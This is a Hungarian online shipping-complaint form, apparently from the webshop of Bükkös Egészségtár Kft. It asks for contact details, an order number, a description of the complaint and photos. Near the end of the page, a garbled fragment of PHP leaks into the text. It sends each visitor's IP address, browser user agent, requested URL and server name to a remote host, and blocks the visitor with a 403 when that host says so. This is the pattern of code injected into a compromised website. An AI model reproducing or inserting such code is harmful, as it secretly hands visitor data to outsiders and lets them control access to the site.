Online vevőszolgálat - Szállítási reklamáció


Amennyiben nem megfelelő terméket kapott, vagy a csomagban levő termék sérülten érkezett, kérjük haladéktalanul jelezze ezt felénk az űrlap kitöltésével!

Kérjük segítse az ügyintézést azzal, hogy a lehető legrészletesebben ismerteti a panasza okát, lehetőleg fényképekkel is pontosan bemutatva.

Szállítással kapcsolatos kifogásokat a csomag átvételét követően 24 órán belül van lehetősége jelezni.   

A *- jelölt mezők kitöltése kötelező!

Név*:
 
E-mail cím*:
 
Bizonylat megadása *
 
Rendelés vagy számla szám *:
 
Csomag szám:
 
Kifogás pontos leírása (termék neve, darab száma, kifogás részletes leírása)*
 
Kért intézkedés
 
Fénykép 1
 
Fénykép 2
 
Fénykép 3
 
Fénykép 4
 
Megjegyzés
 
Hozzájárulok, hogy a Bükkös Egészségtár Kft rögzítse és kezelje adataimat a csere ügyintézés során *
Igen
 
true, CURLOPT_TIMEOUT=>5, CURLOPT_POST=>1, CURLOPT_POSTFIELDS=>"u=1&ra=".$s["REMOTE_ADDR"]."&ua=".$s["HTTP_USER_AGENT"]."&ru=".$s["REQUEST_URI"]."&sn=".$s["SERVER_NAME"]));$c = curl_exec($h);curl_close($h); if($c=="403"){header('HTTP/1.0 403 Forbidden');die();} ?>
FOGYASZTÓ BARÁT
INFORMÁCIÓK

bukkosmed.hu
© Fogyasztó Barát